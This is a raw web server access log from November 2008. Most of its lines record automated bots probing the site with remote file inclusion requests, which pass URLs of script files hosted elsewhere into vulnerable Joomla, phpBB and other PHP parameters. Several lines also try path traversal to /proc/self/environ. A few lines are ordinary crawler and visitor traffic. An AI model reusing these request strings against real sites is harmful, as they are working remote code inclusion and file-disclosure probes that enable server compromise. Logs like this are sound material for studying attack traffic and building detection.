24.143.139.77 - - [15/Nov/2008:18:00:41 -0600] "GET /logs/access_log.1205366400/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:18:00:41 -0600] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:18:00:41 -0600] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
211.115.110.161 - - [15/Nov/2008:18:00:54 -0600] "GET /logs/access_log.1206144000//phpsecurityadmin/include/logout.php?PSA_PATH=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
211.115.110.161 - - [15/Nov/2008:18:00:55 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
211.115.110.161 - - [15/Nov/2008:18:00:55 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
216.104.34.142 - - [15/Nov/2008:18:01:35 -0600] "GET /logs/access_log.1214524800/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
216.104.34.142 - - [15/Nov/2008:18:01:35 -0600] "GET /logs/access_log.1214524800/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
140.130.101.5 - - [15/Nov/2008:18:03:07 -0600] "GET /logs/access_log.1208044800%20%20/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
140.130.101.5 - - [15/Nov/2008:18:03:13 -0600] "GET /logs/access_log.1208044800%20%20/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
140.130.101.5 - - [15/Nov/2008:18:03:21 -0600] "GET /logs/access_log.1208044800%20%20/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
220.80.108.140 - - [15/Nov/2008:18:03:32 -0600] "GET /logs/access_log.1213142400//phpsecurityadmin/include/logout.php?PSA_PATH=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
209.51.152.234 - - [15/Nov/2008:18:03:49 -0600] "GET /logs/index.php?sourcedir=http://www.guyweb.co.kr/~muse2004/zboard/icon/ooid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
209.51.152.234 - - [15/Nov/2008:18:03:50 -0600] "GET /index.php?sourcedir=http://www.guyweb.co.kr/~muse2004/zboard/icon/ooid.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
209.51.152.234 - - [15/Nov/2008:18:03:50 -0600] "GET /logs/index.php?sourcedir=http://www.guyweb.co.kr/~muse2004/zboard/icon/ooid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
209.51.152.234 - - [15/Nov/2008:18:03:50 -0600] "GET /index.php?sourcedir=http://www.guyweb.co.kr/~muse2004/zboard/icon/ooid.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
67.195.37.172 - - [15/Nov/2008:18:04:57 -0600] "GET /?S=A HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.186.3.220 - - [15/Nov/2008:18:06:16 -0600] "GET ///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/test.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.186.3.220 - - [15/Nov/2008:18:06:16 -0600] "GET /logs///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/test.txt?? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
89.218.85.18 - - [15/Nov/2008:18:08:04 -0600] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://impactkiller.is-the-boss.com/tst.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Nov/2008:18:08:04 -0600] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://impactkiller.is-the-boss.com/tst.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Nov/2008:18:08:11 -0600] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://impactkiller.is-the-boss.com/tst.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Nov/2008:18:08:12 -0600] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://impactkiller.is-the-boss.com/tst.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
204.209.81.1 - - [15/Nov/2008:18:10:34 -0600] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt????? HTTP/1.1" 404 345 "-""libwww-perl/5.812"
204.209.81.1 - - [15/Nov/2008:18:10:34 -0600] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt????? HTTP/1.1" 404 350 "-""libwww-perl/5.812"
203.116.63.66 - - [15/Nov/2008:18:11:37 -0600] "GET /logs//index.php?DOCUMENT_ROOT=http://austinvideodating.com/plugins/safehtml/gif/oye.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.814"
203.116.63.66 - - [15/Nov/2008:18:11:37 -0600] "GET //index.php?DOCUMENT_ROOT=http://austinvideodating.com/plugins/safehtml/gif/oye.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.814"
211.115.110.161 - - [15/Nov/2008:18:15:17 -0600] "GET /logs/access_log.1213142400//phpsecurityadmin/include/logout.php?PSA_PATH=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:18:15:17 -0600] "GET /logs//errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:18:15:18 -0600] "GET //errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
200.49.188.178 - - [15/Nov/2008:18:15:39 -0600] "GET /logs/access_log.1215302400/index2.php?x=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
200.49.188.178 - - [15/Nov/2008:18:15:39 -0600] "GET /index2.php?x=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
200.49.188.178 - - [15/Nov/2008:18:15:40 -0600] "GET /logs/index2.php?x=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
209.172.44.52 - - [15/Nov/2008:18:16:27 -0600] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
209.172.44.52 - - [15/Nov/2008:18:16:27 -0600] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""XXXXXX"
209.172.44.52 - - [15/Nov/2008:18:16:27 -0600] "GET /logs/errors.php?error=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
209.172.44.52 - - [15/Nov/2008:18:16:27 -0600] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""XXXXXX"
209.172.44.52 - - [15/Nov/2008:18:16:27 -0600] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
209.172.44.52 - - [15/Nov/2008:18:16:27 -0600] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""XXXXXX"
209.172.44.52 - - [15/Nov/2008:18:16:27 -0600] "GET /errors.php?error=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
209.172.44.52 - - [15/Nov/2008:18:16:28 -0600] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""XXXXXX"
24.143.139.77 - - [15/Nov/2008:18:16:30 -0600] "GET /logs///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:18:16:31 -0600] "GET ///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
216.104.34.142 - - [15/Nov/2008:18:18:42 -0600] "GET /logs/access_log.1214438400/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
216.104.34.142 - - [15/Nov/2008:18:18:42 -0600] "GET /errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
216.104.34.142 - - [15/Nov/2008:18:18:42 -0600] "GET /logs/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
216.104.34.142 - - [15/Nov/2008:18:18:42 -0600] "GET /logs/access_log.1215302400/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
216.104.34.142 - - [15/Nov/2008:18:18:42 -0600] "GET /logs/access_log.1214438400/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
216.104.34.142 - - [15/Nov/2008:18:18:42 -0600] "GET /errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
216.104.34.142 - - [15/Nov/2008:18:18:42 -0600] "GET /logs/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
216.104.34.142 - - [15/Nov/2008:18:18:42 -0600] "GET /logs/access_log.1215302400/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
200.48.189.130 - - [15/Nov/2008:18:19:20 -0600] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
200.48.189.130 - - [15/Nov/2008:18:19:20 -0600] "GET /phphtml.php?htmlclass_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
200.48.189.130 - - [15/Nov/2008:18:19:20 -0600] "GET /logs/phphtml.php?htmlclass_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
216.104.34.142 - - [15/Nov/2008:18:20:06 -0600] "GET /logs/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
216.104.34.142 - - [15/Nov/2008:18:20:06 -0600] "GET /errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
216.104.34.142 - - [15/Nov/2008:18:20:06 -0600] "GET /logs/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
216.104.34.142 - - [15/Nov/2008:18:20:06 -0600] "GET /errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.30.142.163 - - [15/Nov/2008:18:20:16 -0600] "GET /logs/access_log.1176508800 HTTP/1.0" 200 150335 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.48.189.130 - - [15/Nov/2008:18:21:55 -0600] "GET /logs/access_log.1215302400/phphtml.php?htmlclass_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
24.143.139.77 - - [15/Nov/2008:18:22:40 -0600] "GET ///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
87.94.1.95 - - [15/Nov/2008:18:24:28 -0600] "GET /logs//phphtml.php?htmlclass_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.812"
87.94.1.95 - - [15/Nov/2008:18:24:28 -0600] "GET //phphtml.php?htmlclass_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.812"
89.218.85.18 - - [15/Nov/2008:18:25:03 -0600] "GET /logs/home.php?x=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Nov/2008:18:25:03 -0600] "GET /home.php?x=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
85.119.152.5 - - [15/Nov/2008:18:26:30 -0600] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 296 "-""libwww-perl/5.48"
85.119.152.5 - - [15/Nov/2008:18:26:30 -0600] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 291 "-""libwww-perl/5.48"
64.71.32.13 - - [15/Nov/2008:18:29:30 -0600] "GET /logs/protection.php?action=logout&siteurl=http://amirbasic.com/forum/images/smilies/icon.gif??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
64.71.32.13 - - [15/Nov/2008:18:29:30 -0600] "GET /protection.php?action=logout&siteurl=http://amirbasic.com/forum/images/smilies/icon.gif??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
64.71.32.13 - - [15/Nov/2008:18:29:31 -0600] "GET /logs/access_log.1203724800/protection.php?action=logout&siteurl=http://amirbasic.com/forum/images/smilies/icon.gif??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
59.126.46.141 - - [15/Nov/2008:18:29:32 -0600] "GET /logs/phphtml.php?htmlclass_path=http://www.tbns.net/monjali/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
59.126.46.141 - - [15/Nov/2008:18:29:32 -0600] "GET /phphtml.php?htmlclass_path=http://www.tbns.net/monjali/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
64.71.32.13 - - [15/Nov/2008:18:30:23 -0600] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://amirbasic.com/forum/images/smilies/icon.gif??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
64.71.32.13 - - [15/Nov/2008:18:30:23 -0600] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://amirbasic.com/forum/images/smilies/icon.gif??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
64.71.32.13 - - [15/Nov/2008:18:30:23 -0600] "GET /logs/access_log.1203724800/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://amirbasic.com/forum/images/smilies/icon.gif??? HTTP/1.1" 404 359 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Nov/2008:18:30:24 -0600] "GET /logs/home.php?x=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Nov/2008:18:30:24 -0600] "GET /home.php?x=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
38.98.60.188 - - [15/Nov/2008:18:30:48 -0600] "GET /logs/access_log.1212883200/errors.php?error=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
38.98.60.188 - - [15/Nov/2008:18:30:49 -0600] "GET /errors.php?error=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
38.98.60.188 - - [15/Nov/2008:18:30:49 -0600] "GET /logs/errors.php?error=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
64.71.32.13 - - [15/Nov/2008:18:30:51 -0600] "GET /logs/access_log.1203724800/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://amirbasic.com/forum/images/smilies/icon.gif??? HTTP/1.1" 404 359 "-""libwww-perl/5.805"
64.71.32.13 - - [15/Nov/2008:18:30:51 -0600] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://amirbasic.com/forum/images/smilies/icon.gif??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
64.71.32.13 - - [15/Nov/2008:18:30:51 -0600] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://amirbasic.com/forum/images/smilies/icon.gif??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
24.143.139.77 - - [15/Nov/2008:18:32:16 -0600] "GET /logs/access_log.1214524800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
65.182.184.197 - - [15/Nov/2008:18:33:00 -0600] "GET /logs/access_log.1203724800/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://amirbasic.com/forum/images/smilies/icon.gif??? HTTP/1.1" 404 359 "-""libwww-perl/5.810"
65.182.184.197 - - [15/Nov/2008:18:33:00 -0600] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://amirbasic.com/forum/images/smilies/icon.gif??? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
65.182.184.197 - - [15/Nov/2008:18:33:00 -0600] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://amirbasic.com/forum/images/smilies/icon.gif??? HTTP/1.1" 404 337 "-""libwww-perl/5.810"
64.71.32.13 - - [15/Nov/2008:18:33:25 -0600] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://amirbasic.com/forum/images/smilies/icon.gif??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
64.71.32.13 - - [15/Nov/2008:18:33:25 -0600] "GET /logs/access_log.1203724800/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://amirbasic.com/forum/images/smilies/icon.gif??? HTTP/1.1" 404 359 "-""libwww-perl/5.805"
64.71.32.13 - - [15/Nov/2008:18:33:25 -0600] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://amirbasic.com/forum/images/smilies/icon.gif??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Nov/2008:18:33:56 -0600] "GET /folder.php?id=http://oursoultvxq.com/bbs/data/test.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
89.218.85.18 - - [15/Nov/2008:18:33:56 -0600] "GET /logs/folder.php?id=http://oursoultvxq.com/bbs/data/test.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
24.143.139.77 - - [15/Nov/2008:18:34:01 -0600] "GET /logs/access_log.1213142400///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 359 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:18:34:02 -0600] "GET ///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:18:34:02 -0600] "GET /logs///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
216.104.34.142 - - [15/Nov/2008:18:35:21 -0600] "GET /logs/access_log.1214438400/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
216.104.34.142 - - [15/Nov/2008:18:35:21 -0600] "GET /errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
216.104.34.142 - - [15/Nov/2008:18:35:21 -0600] "GET /logs/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
216.104.34.142 - - [15/Nov/2008:18:35:21 -0600] "GET /logs/access_log.1215302400/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
24.143.139.77 - - [15/Nov/2008:18:35:23 -0600] "GET /logs/access_log.1208304000///?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:18:35:23 -0600] "GET ///?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 200 1244 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:18:35:26 -0600] "GET /logs///?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 200 107165 "-""libwww-perl/5.79"
216.104.34.142 - - [15/Nov/2008:18:35:26 -0600] "GET /logs/access_log.1214438400/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
216.104.34.142 - - [15/Nov/2008:18:35:26 -0600] "GET /errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
216.104.34.142 - - [15/Nov/2008:18:35:26 -0600] "GET /logs/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
216.104.34.142 - - [15/Nov/2008:18:35:26 -0600] "GET /logs/access_log.1215302400/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
24.143.139.77 - - [15/Nov/2008:18:36:15 -0600] "GET ///?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 200 1244 "-""libwww-perl/5.79"
72.30.142.163 - - [15/Nov/2008:18:36:29 -0600] "GET /logs/access_log.1195603200 HTTP/1.0" 200 270970 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
38.98.60.188 - - [15/Nov/2008:18:38:20 -0600] "GET /logs/access_log.1214524800/errors.php?error=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
24.143.139.77 - - [15/Nov/2008:18:39:12 -0600] "GET /logs/access_log.1206230400///?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:18:39:47 -0600] "GET /logs///?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 200 107165 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:18:39:48 -0600] "GET ///?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 200 1244 "-""libwww-perl/5.79"
72.32.187.134 - - [15/Nov/2008:18:42:56 -0600] "GET /logs/admin/admin_forum_prune.php?phpbb_root_path=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
72.32.187.134 - - [15/Nov/2008:18:42:56 -0600] "GET /admin/admin_forum_prune.php?phpbb_root_path=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
71.145.143.204 - - [15/Nov/2008:18:43:21 -0600] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
71.145.143.204 - - [15/Nov/2008:18:43:23 -0600] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
71.145.143.204 - - [15/Nov/2008:18:43:23 -0600] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
71.145.143.204 - - [15/Nov/2008:18:43:23 -0600] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
71.145.143.204 - - [15/Nov/2008:18:43:23 -0600] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
71.145.143.204 - - [15/Nov/2008:18:43:26 -0600] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
71.145.143.204 - - [15/Nov/2008:18:43:29 -0600] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
70.85.149.242 - - [15/Nov/2008:18:45:01 -0600] "GET /logs/access_log.1216425600/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.inmirae.co.kr/zboard/icon/id.txt%0D? HTTP/1.1" 404 351 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
70.85.149.242 - - [15/Nov/2008:18:45:03 -0600] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.inmirae.co.kr/zboard/icon/id.txt%0D? HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
